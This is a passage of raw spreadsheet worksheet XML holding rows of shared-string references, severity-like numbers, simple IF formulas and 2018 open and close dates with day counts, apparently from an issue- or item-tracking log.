      </c>
    </row>
    <row r="7" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A7" s="3" t="s">
        <v>752</v>
      </c>
      <c r="B7" s="4" t="s">
        <v>753</v>
      </c>
      <c r="C7" s="4" t="s">
        <v>754</v>
      </c>
      <c r="D7" s="4" t="s">
        <v>755</v>
      </c>
      <c r="E7" s="4" t="s">
        <v>756</v>
      </c>
      <c r="F7" s="4" t="s">
        <v>757</v>
      </c>
      <c r="G7" s="4" t="s">
        <v>758</v>
      </c>
      <c r="H7" s="4">
        <v>2</v>
      </c>
      <c r="I7" s="4" t="s">
        <v>71</v>
      </c>
      <c r="J7" s="4" t="s">
        <v>759</v>
      </c>
      <c r="K7" s="4" t="b">
        <v>0</v>
      </c>
      <c r="L7" s="4">
        <f>IF(out!$G7="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M7" s="5" t="s">
        <v>760</v>
      </c>
      <c r="N7" s="12" t="s">
        <v>761</v>
      </c>
      <c r="O7" s="13" t="str">
        <f t="shared" si="0"/>
        <v>2018-01-30</v>
      </c>
      <c r="P7" s="12" t="s">
        <v>762</v>
      </c>
      <c r="Q7" s="13" t="str">
        <f t="shared" si="1"/>
        <v>2018-02-13</v>
      </c>
      <c r="R7" s="18">
        <f t="shared" si="2"/>
        <v>14</v>
      </c>
      <c r="S7" s="4"/>
      <c r="T7" s="4" t="s">
        <v>436</v>
      </c>
      <c r="U7" s="4" t="s">
        <v>763</v>
      </c>
      <c r="V7" s="7" t="s">
        <v>438</v>
      </c>
    </row>
    <row r="8" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A8" s="3" t="s">
        <v>740</v>
      </c>
      <c r="B8" s="4" t="s">
        <v>741</v>
      </c>
      <c r="C8" s="4" t="s">
        <v>742</v>
      </c>
      <c r="D8" s="4" t="s">
        <v>743</v>
      </c>
      <c r="E8" s="4" t="s">
        <v>744</v>
      </c>
      <c r="F8" s="4" t="s">
        <v>745</v>
      </c>
      <c r="G8" s="4" t="s">
        <v>746</v>
      </c>
      <c r="H8" s="4">
        <v>2</v>
      </c>
      <c r="I8" s="4" t="s">
        <v>71</v>
      </c>
      <c r="J8" s="4" t="s">
        <v>747</v>
      </c>
      <c r="K8" s="4" t="b">
        <v>0</v>
      </c>
      <c r="L8" s="4">
        <f>IF(out!$G8="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M8" s="5" t="s">
        <v>748</v>
      </c>
      <c r="N8" s="12" t="s">
        <v>749</v>
      </c>
      <c r="O8" s="13" t="str">
        <f t="shared" si="0"/>
        <v>2018-02-01</v>
      </c>
      <c r="P8" s="12" t="s">
        <v>750</v>
      </c>
      <c r="Q8" s="13" t="str">
        <f t="shared" si="1"/>
        <v>2018-02-15</v>
      </c>
      <c r="R8" s="18">
        <f t="shared" si="2"/>
        <v>14</v>
      </c>
      <c r="S8" s="4"/>
      <c r="T8" s="4" t="s">
        <v>436</v>
      </c>
      <c r="U8" s="4" t="s">
        <v>751</v>
      </c>
      <c r="V8" s="7" t="s">
        <v>438</v>
      </c>
    </row>
    <row r="9" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A9" s="3" t="s">
        <v>728</v>
      </c>
      <c r="B9" s="4" t="s">
        <v>729</v>
      </c>
      <c r="C9" s="4" t="s">
        <v>730</v>
      </c>
      <c r="D9" s="4" t="s">
        <v>731</v>
      </c>
      <c r="E9" s="4" t="s">
        <v>732</v>
      </c>
      <c r="F9" s="4" t="s">
        <v>733</v>
      </c>
      <c r="G9" s="4" t="s">
        <v>734</v>
      </c>
      <c r="H9" s="4">
        <v>2</v>
      </c>
      <c r="I9" s="4" t="s">
        <v>71</v>
      </c>
      <c r="J9" s="4" t="s">
        <v>735</v>
      </c>
      <c r="K9" s="4" t="b">
        <v>0</v>
      </c>
      <c r="L9" s="4">
        <f>IF(out!$G9="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M9" s="5" t="s">
        <v>736</v>
      </c>
      <c r="N9" s="12" t="s">
        <v>737</v>
      </c>
      <c r="O9" s="13" t="str">
        <f t="shared" si="0"/>
        <v>2018-01-31</v>
      </c>
      <c r="P9" s="12" t="s">
        <v>738</v>
      </c>
      <c r="Q9" s="13" t="str">
        <f t="shared" si="1"/>
        <v>2018-02-15</v>
      </c>
      <c r="R9" s="18">
        <f t="shared" si="2"/>
        <v>15</v>
      </c>
      <c r="S9" s="4"/>
      <c r="T9" s="4" t="s">
        <v>422</v>
      </c>
      <c r="U9" s="4" t="s">
        <v>739</v>
      </c>
      <c r="V9" s="7" t="s">
        <v>424</v>
      </c>
    </row>
    <row r="10" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A10" s="3" t="s">
        <v>716</v>
      </c>
      <c r="B10" s="4" t="s">
        <v>717</v>
      </c>
      <c r="C10" s="4" t="s">
        <v>718</v>
      </c>
      <c r="D10" s="4" t="s">
        <v>719</v>
      </c>
      <c r="E10" s="4" t="s">
        <v>720</v>
      </c>
      <c r="F10" s="4" t="s">
        <v>721</v>
      </c>
      <c r="G10" s="4" t="s">
        <v>722</v>
      </c>
      <c r="H10" s="4">
        <v>2</v>
      </c>
      <c r="I10" s="4" t="s">
        <v>71</v>
      </c>
      <c r="J10" s="4" t="s">
        <v>723</v>
      </c>
      <c r="K10" s="4" t="b">
        <v>0</v>
      </c>
      <c r="L10" s="4">
        <f>IF(out!$G10="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M10" s="5" t="s">
        <v>724</v>
      </c>
      <c r="N10" s="12" t="s">
        <v>725</v>
      </c>
      <c r="O10" s="13" t="str">
        <f t="shared" si="0"/>
        <v>2018-01-31</v>
      </c>
      <c r="P10" s="12" t="s">
        <v>726</v>
      </c>
      <c r="Q10" s="13" t="str">
        <f t="shared" si="1"/>
        <v>2018-02-15</v>
      </c>
      <c r="R10" s="18">
        <f t="shared" si="2"/>
        <v>15</v>
      </c>
      <c r="S10" s="4"/>
      <c r="T10" s="4" t="s">
        <v>422</v>
      </c>
      <c r="U10" s="4" t="s">
        <v>727</v>
      </c>
      <c r="V10" s="7" t="s">
        <v>424</v>
      </c>
    </row>
    <row r="11" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A11" s="3" t="s">
        <v>703</v>
      </c>
      <c r="B11" s="4" t="s">
        <v>704</v>
      </c>
      <c r="C11" s="4" t="s">
        <v>705</v>
      </c>
      <c r="D11" s="4" t="s">
        <v>706</v>
      </c>
      <c r="E11" s="4" t="s">
        <v>707</v>
      </c>
      <c r="F11" s="4" t="s">
        <v>708</v>
      </c>
      <c r="G11" s="4" t="s">
        <v>70</v>
      </c>
      <c r="H11" s="4">
        <v>2</v>
      </c>
      <c r="I11" s="4" t="s">
        <v>71</v>
      </c>
      <c r="J11" s="4" t="s">
        <v>709</v>
      </c>
      <c r="K11" s="4" t="b">
        <v>0</v>
      </c>
      <c r="L11" s="4">
        <f>IF(out!$G11="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M11" s="5" t="s">
        <v>710</v>
      </c>
      <c r="N11" s="12" t="s">
        <v>711</v>
      </c>
      <c r="O11" s="13" t="str">
        <f t="shared" si="0"/>
        <v>2018-01-30</v>
      </c>
      <c r="P11" s="12" t="s">
        <v>712</v>
      </c>
      <c r="Q11" s="13" t="str">
        <f t="shared" si="1"/>
        <v>2018-02-15</v>
      </c>
      <c r="R11" s="18">
        <f t="shared" si="2"/>
        <v>16</v>
      </c>
      <c r="S11" s="4"/>
      <c r="T11" s="4" t="s">
        <v>713</v>
      </c>
      <c r="U11" s="4" t="s">
        <v>714</v>
      </c>
      <c r="V11" s="7" t="s">
        <v>715</v>
      </c>
    </row>
    <row r="12" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A12" s="3" t="s">
        <v>688</v>
      </c>
      <c r="B12" s="4" t="s">
        <v>689</v>
      </c>
      <c r="C12" s="4" t="s">
        <v>690</v>
      </c>
      <c r="D12" s="4">
        <v>626</v>
      </c>
      <c r="E12" s="4" t="s">
        <v>691</v>
      </c>
      <c r="F12" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G12" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H12" s="4">
        <v>8</v>
      </c>
      <c r="I12" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J12" s="4" t="s">
        <v>692</v>
      </c>
      <c r="K12" s="4" t="b">
        <v>0</v>
      </c>
      <c r="L12" s="4">
        <f>IF(out!$G12="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M12" s="5" t="s">
        <v>693</v>
      </c>
      <c r="N12" s="12" t="s">
        <v>694</v>
      </c>
      <c r="O12" s="13" t="str">
        <f t="shared" si="0"/>
        <v>2018-01-31</v>
      </c>
      <c r="P12" s="12" t="s">
        <v>695</v>
      </c>
      <c r="Q12" s="13" t="str">
        <f t="shared" si="1"/>
        <v>2018-02-26</v>
      </c>
      <c r="R12" s="18">
        <f t="shared" si="2"/>
        <v>26</v>
      </c>
      <c r="S12" s="4"/>
      <c r="T12" s="4" t="s">
        <v>696</v>
      </c>
      <c r="U12" s="4" t="s">
        <v>697</v>
      </c>
      <c r="V12" s="7" t="s">
        <v>698</v>
      </c>
    </row>
    <row r="13" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A13" s="3" t="s">
        <v>670</v>
      </c>
      <c r="B13" s="4" t="s">
        <v>671</v>
      </c>
      <c r="C13" s="4" t="s">
        <v>672</v>
      </c>
      <c r="D13" s="4" t="s">
        <v>673</v>
      </c>
      <c r="E13" s="4" t="s">
        <v>674</v>
      </c>
      <c r="F13" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G13" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H13" s="4">
        <v>8</v>
      </c>
      <c r="I13" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J13" s="4" t="s">
        <v>675</v>
      </c>
      <c r="K13" s="4" t="b">
        <v>0</v>
      </c>
      <c r="L13" s="4">
        <f>IF(out!$G13="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M13" s="5" t="s">
        <v>676</v>
      </c>
      <c r="N13" s="12" t="s">
        <v>677</v>
      </c>
      <c r="O13" s="13" t="str">
        <f t="shared" si="0"/>
        <v>2018-01-26</v>
      </c>
      <c r="P13" s="12" t="s">
        <v>678</v>
      </c>
      <c r="Q13" s="13" t="str">
        <f t="shared" si="1"/>
        <v>2018-02-26</v>
      </c>
      <c r="R13" s="18">
        <f t="shared" si="2"/>
        <v>31</v>
      </c>
      <c r="S13" s="4"/>
      <c r="T13" s="4" t="s">
        <v>679</v>
      </c>
      <c r="U13" s="4" t="s">
        <v>680</v>
      </c>
      <c r="V13" s="7" t="s">
        <v>681</v>
      </c>
    </row>
    <row r="14" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A14" s="3" t="s">
        <v>658</v>
      </c>
      <c r="B14" s="4" t="s">
        <v>659</v>
      </c>
      <c r="C14" s="4" t="s">
        <v>660</v>
      </c>
      <c r="D14" s="4" t="s">
        <v>67</v>
      </c>
      <c r="E14" s="4" t="s">
        <v>68</v>
      </c>
      <c r="F14" s="4" t="s">
        <v>661</v>
      </c>
      <c r="G14" s="4" t="s">
        <v>662</v>
      </c>
      <c r="H14" s="4">
        <v>8</v>
      </c>
      <c r="I14" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J14" s="4" t="s">
        <v>663</v>
      </c>
      <c r="K14" s="4" t="b">
        <v>0</v>
      </c>
      <c r="L14" s="4">
        <f>IF(out!$G14="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M14" s="5" t="s">
        <v>664</v>
      </c>
      <c r="N14" s="12" t="s">
        <v>665</v>
      </c>
      <c r="O14" s="13" t="str">
        <f t="shared" si="0"/>
        <v>2018-01-31</v>
      </c>
      <c r="P14" s="12" t="s">
        <v>666</v>
      </c>
      <c r="Q14" s="13" t="str">
        <f t="shared" si="1"/>
        <v>2018-02-26</v>
      </c>
      <c r="R14" s="18">
        <f t="shared" si="2"/>
        <v>26</v>
      </c>
      <c r="S14" s="4"/>
      <c r="T14" s="4" t="s">
        <v>667</v>
      </c>
      <c r="U14" s="4" t="s">
        <v>668</v>
      </c>
      <c r="V14" s="7" t="s">
        <v>669</v>
      </c>
    </row>
    <row r="15" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A15" s="3" t="s">
        <v>626</v>
      </c>
      <c r="B15" s="4" t="s">
        <v>627</v>
      </c>
      <c r="C15" s="4" t="s">
        <v>628</v>
      </c>
      <c r="D15" s="4" t="s">
        <v>236</v>
      </c>
      <c r="E15" s="4" t="s">
        <v>237</v>
      </c>
      <c r="F15" s="4" t="s">
        <v>629</v>
      </c>
      <c r="G15" s="4" t="s">
        <v>630</v>
      </c>
      <c r="H15" s="4">
        <v>8</v>
      </c>
      <c r="I15" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J15" s="4" t="s">
        <v>631</v>
      </c>
      <c r="K15" s="4" t="b">
        <v>0</v>
      </c>
      <c r="L15" s="4">
        <f>IF(out!$G15="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M15" s="5" t="s">
        <v>632</v>
      </c>
      <c r="N15" s="12" t="s">
        <v>633</v>
      </c>
      <c r="O15" s="13" t="str">
        <f t="shared" si="0"/>
        <v>2018-01-25</v>
      </c>
      <c r="P15" s="12" t="s">
        <v>634</v>
      </c>
      <c r="Q15" s="13" t="str">
        <f t="shared" si="1"/>
        <v>2018-03-01</v>
      </c>
      <c r="R15" s="18">
        <f t="shared" si="2"/>
        <v>35</v>
      </c>
      <c r="S15" s="4"/>
      <c r="T15" s="4" t="s">
        <v>635</v>
      </c>
      <c r="U15" s="4" t="s">
        <v>636</v>
      </c>
      <c r="V15" s="7" t="s">
        <v>637</v>
      </c>
    </row>
    <row r="16" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A16" s="3" t="s">
        <v>563</v>
      </c>
      <c r="B16" s="4" t="s">
        <v>564</v>
      </c>
      <c r="C16" s="4" t="s">
        <v>565</v>
      </c>
      <c r="D16" s="4" t="s">
        <v>566</v>
      </c>
      <c r="E16" s="4" t="s">
        <v>567</v>
      </c>
      <c r="F16" s="4" t="s">
        <v>568</v>
      </c>
      <c r="G16" s="4" t="s">
        <v>569</v>
      </c>
      <c r="H16" s="4">
        <v>8</v>
      </c>
      <c r="I16" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J16" s="4" t="s">
        <v>570</v>
      </c>
      <c r="K16" s="4" t="b">
        <v>0</v>
      </c>
      <c r="L16" s="4">
        <f>IF(out!$G16="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M16" s="5" t="s">
        <v>571</v>
      </c>
      <c r="N16" s="12" t="s">
        <v>572</v>
      </c>
      <c r="O16" s="13" t="str">
        <f t="shared" si="0"/>
        <v>2018-01-26</v>
      </c>
      <c r="P16" s="12" t="s">
        <v>573</v>
      </c>
      <c r="Q16" s="13" t="str">
        <f t="shared" si="1"/>
        <v>2018-03-01</v>
      </c>
      <c r="R16" s="18">
        <f t="shared" si="2"/>
        <v>34</v>
      </c>
      <c r="S16" s="4"/>
      <c r="T16" s="4" t="s">
        <v>574</v>
      </c>
      <c r="U16" s="4" t="s">
        <v>575</v>
      </c>
      <c r="V16" s="7" t="s">
        <v>576</v>
      </c>
    </row>
    <row r="17" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A17" s="3" t="s">
        <v>607</v>
      </c>
      <c r="B17" s="4" t="s">
        <v>608</v>
      </c>
      <c r="C17" s="4" t="s">
        <v>609</v>
      </c>
      <c r="D17" s="4" t="s">
        <v>610</v>
      </c>
      <c r="E17" s="4" t="s">
        <v>611</v>
      </c>
      <c r="F17" s="4" t="s">
        <v>612</v>
      </c>
      <c r="G17" s="4" t="s">
        <v>613</v>
      </c>
      <c r="H17" s="4">
        <v>8</v>
      </c>
      <c r="I17" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J17" s="4" t="s">
        <v>614</v>
      </c>
      <c r="K17" s="4" t="b">
        <v>0</v>
      </c>
      <c r="L17" s="4">
        <f>IF(out!$G17="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M17" s="5" t="s">
        <v>615</v>
      </c>
      <c r="N17" s="12" t="s">
        <v>616</v>
      </c>
      <c r="O17" s="13" t="str">
        <f t="shared" si="0"/>
        <v>2018-02-23</v>
      </c>
      <c r="P17" s="12" t="s">
        <v>617</v>
      </c>
      <c r="Q17" s="13" t="str">
        <f t="shared" si="1"/>
        <v>2018-03-06</v>
      </c>
      <c r="R17" s="18">
        <f t="shared" si="2"/>
        <v>11</v>
      </c>
      <c r="S17" s="4" t="s">
        <v>618</v>
      </c>
      <c r="T17" s="4" t="s">
        <v>618</v>
      </c>
      <c r="U17" s="4" t="s">
        <v>619</v>
      </c>
      <c r="V17" s="7" t="s">
        <v>620</v>
      </c>
    </row>
    <row r="18" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A18" s="3" t="s">
        <v>638</v>
      </c>
      <c r="B18" s="4" t="s">
        <v>639</v>
      </c>
      <c r="C18" s="4" t="s">
        <v>640</v>
      </c>
      <c r="D18" s="4" t="s">
        <v>641</v>
      </c>
      <c r="E18" s="4" t="s">
        <v>642</v>
      </c>
      <c r="F18" s="4" t="s">
        <v>643</v>
      </c>
      <c r="G18" s="4" t="s">
        <v>644</v>
      </c>
      <c r="H18" s="4">
        <v>8</v>
      </c>
      <c r="I18" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J18" s="4" t="s">
        <v>645</v>
      </c>
      <c r="K18" s="4" t="b">
        <v>0</v>
      </c>
      <c r="L18" s="4">
        <f>IF(out!$G18="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M18" s="5" t="s">
        <v>646</v>
      </c>
      <c r="N18" s="12" t="s">
        <v>647</v>
      </c>
      <c r="O18" s="13" t="str">
        <f t="shared" si="0"/>
        <v>2018-01-25</v>
      </c>
      <c r="P18" s="12" t="s">
        <v>648</v>
      </c>
      <c r="Q18" s="13" t="str">
        <f t="shared" si="1"/>
        <v>2018-03-07</v>
      </c>
      <c r="R18" s="18">
        <f t="shared" si="2"/>
        <v>41</v>
      </c>
      <c r="S18" s="4"/>
      <c r="T18" s="4" t="s">
        <v>649</v>
      </c>
      <c r="U18" s="4" t="s">
        <v>650</v>
      </c>
      <c r="V18" s="7" t="s">
        <v>651</v>
      </c>
    </row>
    <row r="19" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A19" s="3" t="s">
        <v>595</v>
      </c>
      <c r="B19" s="4" t="s">
        <v>596</v>
      </c>
      <c r="C19" s="4" t="s">
        <v>597</v>
      </c>
      <c r="D19" s="4" t="s">
        <v>598</v>
      </c>
      <c r="E19" s="4" t="s">
        <v>599</v>
      </c>
      <c r="F19" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G19" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H19" s="4">
        <v>8</v>
      </c>
      <c r="I19" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J19" s="4" t="s">
        <v>600</v>
      </c>
      <c r="K19" s="4" t="b">
        <v>0</v>
      </c>
      <c r="L19" s="4">
        <f>IF(out!$G19="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M19" s="5" t="s">
        <v>601</v>
      </c>
      <c r="N19" s="12" t="s">
        <v>602</v>
      </c>
      <c r="O19" s="13" t="str">
        <f t="shared" si="0"/>
        <v>2018-01-31</v>
      </c>
      <c r="P19" s="12" t="s">
        <v>603</v>
      </c>
      <c r="Q19" s="13" t="str">
        <f t="shared" si="1"/>
        <v>2018-03-10</v>
      </c>
      <c r="R19" s="18">
        <f t="shared" si="2"/>
        <v>38</v>
      </c>
      <c r="S19" s="4"/>
      <c r="T19" s="4" t="s">
        <v>604</v>
      </c>
      <c r="U19" s="4" t="s">
        <v>605</v>
      </c>
      <c r="V19" s="7" t="s">
        <v>606</v>
      </c>
    </row>
    <row r="20" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A20" s="3" t="s">
        <v>577</v>
      </c>
      <c r="B20" s="4" t="s">
        <v>578</v>
      </c>
      <c r="C20" s="4" t="s">
        <v>579</v>
      </c>
      <c r="D20" s="4" t="s">
        <v>21</v>
      </c>
      <c r="E20" s="4" t="s">
        <v>22</v>
      </c>
      <c r="F20" s="4" t="s">
        <v>580</v>
      </c>
      <c r="G20" s="4" t="s">
        <v>581</v>
      </c>
      <c r="H20" s="4">
        <v>8</v>
      </c>
      <c r="I20" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J20" s="4" t="s">
        <v>582</v>
      </c>
      <c r="K20" s="4" t="b">
        <v>0</v>
      </c>
      <c r="L20" s="4">
        <f>IF(out!$G20="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M20" s="5" t="s">
        <v>583</v>
      </c>
      <c r="N20" s="12" t="s">
        <v>584</v>
      </c>
      <c r="O20" s="13" t="str">
        <f t="shared" si="0"/>
        <v>2018-01-24</v>
      </c>
      <c r="P20" s="12" t="s">
        <v>585</v>
      </c>
      <c r="Q20" s="13" t="str">
        <f t="shared" si="1"/>
        <v>2018-03-13</v>
      </c>
      <c r="R20" s="18">
        <f t="shared" si="2"/>
        <v>48</v>
      </c>
      <c r="S20" s="4"/>
      <c r="T20" s="4" t="s">
        <v>586</v>
      </c>
      <c r="U20" s="4" t="s">
        <v>587</v>
      </c>
      <c r="V20" s="7" t="s">
        <v>588</v>
      </c>
    </row>
    <row r="21" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A21" s="3" t="s">
        <v>507</v>
      </c>
      <c r="B21" s="4" t="s">
        <v>508</v>
      </c>
      <c r="C21" s="4" t="s">
        <v>509</v>
      </c>
      <c r="D21" s="4" t="s">
        <v>510</v>
      </c>
      <c r="E21" s="4" t="s">
        <v>511</v>
      </c>
      <c r="F21" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G21" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H21" s="4">
        <v>8</v>
      </c>
      <c r="I21" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J21" s="4" t="s">
        <v>512</v>
      </c>
      <c r="K21" s="4" t="b">
        <v>0</v>
      </c>
      <c r="L21" s="4">
        <f>IF(out!$G21="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M21" s="5" t="s">
        <v>513</v>
      </c>
      <c r="N21" s="12" t="s">
        <v>514</v>
      </c>
      <c r="O21" s="13" t="str">
        <f t="shared" si="0"/>
        <v>2018-01-25</v>
      </c>
      <c r="P21" s="12" t="s">
        <v>515</v>
      </c>
      <c r="Q21" s="13" t="str">
        <f t="shared" si="1"/>
        <v>2018-03-28</v>
      </c>
      <c r="R21" s="18">
        <f t="shared" si="2"/>
        <v>62</v>
      </c>
      <c r="S21" s="4"/>
      <c r="T21" s="4" t="s">
        <v>516</v>
      </c>
      <c r="U21" s="4" t="s">
        <v>517</v>
      </c>
      <c r="V21" s="7" t="s">
        <v>518</v>
      </c>
    </row>
    <row r="22" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A22" s="3" t="s">
        <v>494</v>
      </c>
      <c r="B22" s="4" t="s">
        <v>495</v>
      </c>
      <c r="C22" s="4" t="s">
        <v>496</v>
      </c>
      <c r="D22" s="4" t="s">
        <v>497</v>
      </c>
      <c r="E22" s="4" t="s">
        <v>498</v>
      </c>
      <c r="F22" s="4" t="s">
        <v>375</v>
      </c>
      <c r="G22" s="4" t="s">
        <v>376</v>
      </c>
      <c r="H22" s="4">
        <v>8</v>
      </c>
      <c r="I22" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J22" s="4" t="s">
        <v>499</v>
      </c>
      <c r="K22" s="4" t="b">
        <v>0</v>
      </c>
      <c r="L22" s="4">
        <f>IF(out!$G22="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M22" s="5" t="s">
        <v>500</v>
      </c>
      <c r="N22" s="12" t="s">
        <v>501</v>
      </c>
      <c r="O22" s="13" t="str">
        <f t="shared" si="0"/>
        <v>2018-02-25</v>
      </c>
      <c r="P22" s="12" t="s">
        <v>502</v>
      </c>
      <c r="Q22" s="13" t="str">
        <f t="shared" si="1"/>
        <v>2018-03-28</v>
      </c>
      <c r="R22" s="18">
        <f t="shared" si="2"/>
        <v>31</v>
      </c>
      <c r="S22" s="4" t="s">
        <v>503</v>
      </c>
      <c r="T22" s="4" t="s">
        <v>504</v>
      </c>
      <c r="U22" s="4" t="s">
        <v>505</v>
      </c>
      <c r="V22" s="7" t="s">
        <v>506</v>
      </c>
    </row>
    <row r="23" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A23" s="3" t="s">
        <v>331</v>
      </c>
      <c r="B23" s="4" t="s">
        <v>332</v>
      </c>
      <c r="C23" s="4" t="s">
        <v>333</v>
      </c>
      <c r="D23" s="4" t="s">
        <v>334</v>
      </c>
      <c r="E23" s="4" t="s">
        <v>335</v>
      </c>
      <c r="F23" s="4" t="s">
        <v>336</v>
      </c>
      <c r="G23" s="4" t="s">
        <v>125</v>
      </c>
      <c r="H23" s="4">
        <v>6.5</v>
      </c>
      <c r="I23" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J23" s="4" t="s">
        <v>337</v>
      </c>
      <c r="K23" s="4" t="b">
        <v>0</v>
      </c>
      <c r="L23" s="4">
        <f>IF(out!$G23="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M23" s="5" t="s">
        <v>338</v>
      </c>
      <c r="N23" s="12" t="s">
        <v>339</v>
      </c>
      <c r="O23" s="13" t="str">
        <f t="shared" si="0"/>
        <v>2018-03-03</v>
      </c>
      <c r="P23" s="12" t="s">
        <v>340</v>
      </c>
      <c r="Q23" s="13" t="str">
        <f t="shared" si="1"/>
        <v>2018-04-08</v>
      </c>
      <c r="R23" s="18">
        <f t="shared" si="2"/>
        <v>36</v>
      </c>
      <c r="S23" s="5" t="s">
        <v>188</v>
      </c>
      <c r="T23" s="5" t="s">
        <v>145</v>
      </c>
      <c r="U23" s="4" t="s">
        <v>341</v>
      </c>
      <c r="V23" s="8" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="24" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A24" s="3" t="s">
        <v>463</v>
      </c>
      <c r="B24" s="4" t="s">
        <v>464</v>
      </c>
      <c r="C24" s="4" t="s">
        <v>465</v>
      </c>
      <c r="D24" s="4" t="s">
        <v>466</v>
      </c>
      <c r="E24" s="4" t="s">
        <v>467</v>
      </c>
      <c r="F24" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G24" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H24" s="4">
        <v>8</v>
      </c>
      <c r="I24" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J24" s="4" t="s">
        <v>468</v>
      </c>
      <c r="K24" s="4" t="b">
        <v>0</v>
      </c>
      <c r="L24" s="4">
        <f>IF(out!$G24="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M24" s="5" t="s">
        <v>469</v>
      </c>
      <c r="N24" s="12" t="s">
        <v>470</v>
      </c>
      <c r="O24" s="13" t="str">
        <f t="shared" si="0"/>
        <v>2018-02-17</v>
      </c>
      <c r="P24" s="12" t="s">
        <v>471</v>
      </c>
      <c r="Q24" s="13" t="str">
        <f t="shared" si="1"/>
        <v>2018-04-09</v>
      </c>
      <c r="R24" s="18">
        <f t="shared" si="2"/>
        <v>51</v>
      </c>
      <c r="S24" s="4"/>
      <c r="T24" s="4" t="s">
        <v>472</v>
      </c>
      <c r="U24" s="4" t="s">
        <v>473</v>
      </c>
      <c r="V24" s="7" t="s">
        <v>474</v>
      </c>
    </row>
    <row r="25" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A25" s="3" t="s">
        <v>451</v>
      </c>
      <c r="B25" s="4" t="s">
        <v>452</v>
      </c>
      <c r="C25" s="4" t="s">
        <v>453</v>
      </c>
      <c r="D25" s="4" t="s">
        <v>454</v>
      </c>
      <c r="E25" s="4" t="s">
        <v>455</v>
      </c>
      <c r="F25" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G25" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H25" s="4">
        <v>2</v>
      </c>
      <c r="I25" s="4" t="s">
        <v>71</v>
      </c>
      <c r="J25" s="4" t="s">
        <v>456</v>
      </c>
      <c r="K25" s="4" t="b">
        <v>0</v>
      </c>
      <c r="L25" s="4">
        <f>IF(out!$G25="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M25" s="5" t="s">
        <v>457</v>
      </c>
      <c r="N25" s="12" t="s">
        <v>458</v>
      </c>
      <c r="O25" s="13" t="str">
        <f t="shared" si="0"/>
        <v>2018-02-15</v>
      </c>
      <c r="P25" s="12" t="s">
        <v>459</v>
      </c>
      <c r="Q25" s="13" t="str">
        <f t="shared" si="1"/>
        <v>2018-04-15</v>
      </c>
      <c r="R25" s="18">
        <f t="shared" si="2"/>
        <v>59</v>
      </c>
      <c r="S25" s="4"/>
      <c r="T25" s="4" t="s">
        <v>460</v>
      </c>
      <c r="U25" s="4" t="s">
        <v>461</v>
      </c>
      <c r="V25" s="7" t="s">
        <v>462</v>
      </c>
    </row>
    <row r="26" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A26" s="3" t="s">
        <v>439</v>
      </c>
      <c r="B26" s="4" t="s">
        <v>440</v>
      </c>
      <c r="C26" s="4" t="s">
